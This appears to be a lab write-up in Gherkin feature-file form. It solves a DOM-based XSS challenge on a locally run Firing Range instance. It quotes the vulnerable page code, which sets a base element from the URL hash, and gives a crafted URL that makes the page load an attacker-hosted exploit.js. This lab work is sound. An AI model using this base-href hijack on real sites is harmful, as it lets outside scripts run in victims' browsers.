# language: en

Feature: URL Based DOM XSS - location hash - base.href
  From the Firing Range system

  Background:
    Given I'm running macOS High Sierra 10.13.6 (17G65)
    And using Docker version 18.06.0-ce, build 26399
    And also using Safari Version 11.1.2 (13605.3.8)
    And installed Firiring Range locally
    Given the following scenario
    """
    URL: http://localhost:8080/urldom/location/hash/base.href#//example.org
    Details:
      - Page in blank
    Objective: Perform an XSS attack with th base.href parameter
    """

    Scenario: Upload of a js attempt
    Given I am running MAMP to a localhost on port 80:90  with a js file
    And write a javascript code as following
    """
    alert('THIS IS AN XSS');
    """
    When I looked at the source code
    And found that depends on the url passed so I changed to
    """
    var payload = document.location.hash.substr(1);
    var baseElement = document.createElement("base");
    baseElement.href = payload;
    document.head.appendChild(baseElement);
    var scriptTag = document.createElement("script");
    scriptTag.src = "exploit.js";
    document.body.appendChild(scriptTag);
    """
    And noticed that it execute the 'exploit.js' of the 'base'
    Then I rename my javascript file to exploit.js
    And pass the URL of my localhost as parameter for the href as following
    """
    http://localhost:8080/urldom/location/hash/base.href#http://localhost:8090/
    untitled.html
    """
    And once I reloaded the page a popup appeared with message 'THIS IS AN XSS'
